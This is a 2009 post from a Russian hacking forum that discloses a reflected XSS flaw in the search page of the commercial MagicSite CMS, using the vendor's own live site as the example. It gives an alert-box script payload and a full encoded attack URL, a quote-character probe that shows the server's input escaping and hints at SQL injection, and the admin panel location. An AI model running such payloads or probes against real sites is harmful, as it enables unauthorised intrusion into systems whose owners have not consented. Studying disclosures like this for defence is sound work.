
15.05.2009, 17:17
|
|
Познающий
Регистрация: 07.05.2009
Сообщений: 64
Провел на форуме: 418218
Репутация:
59
|
|
MagicSite CMS XSS
В строке поиска <script>alert('Antichat')</script>
Код:
http://www.magicsite.ru/search.php?sword=%3Cscript%3Ealert%28%27Antichat%27%29%3C%2Fscript%3E&x=0&y=0
Одним запросом и XSS и раскрытие путей и скуль инжект не далеке 
На сервере у них magic_quotes=ON, так как даные слешируются!
Код:
http://www.magicsite.ru/search.php?sword=1'
Вы искали: "1 \'"
Не далеко и скуль инжект!
Админка: http://www.magicsite.ru/admin/
Но вход разршон с браузера Microsoft Internet Explorer версии 5.5 и выше!
P.S.: Её продают за 24 505,00 р. =//
Последний раз редактировалось bug1z; 15.05.2009 в 17:22..
|
|
|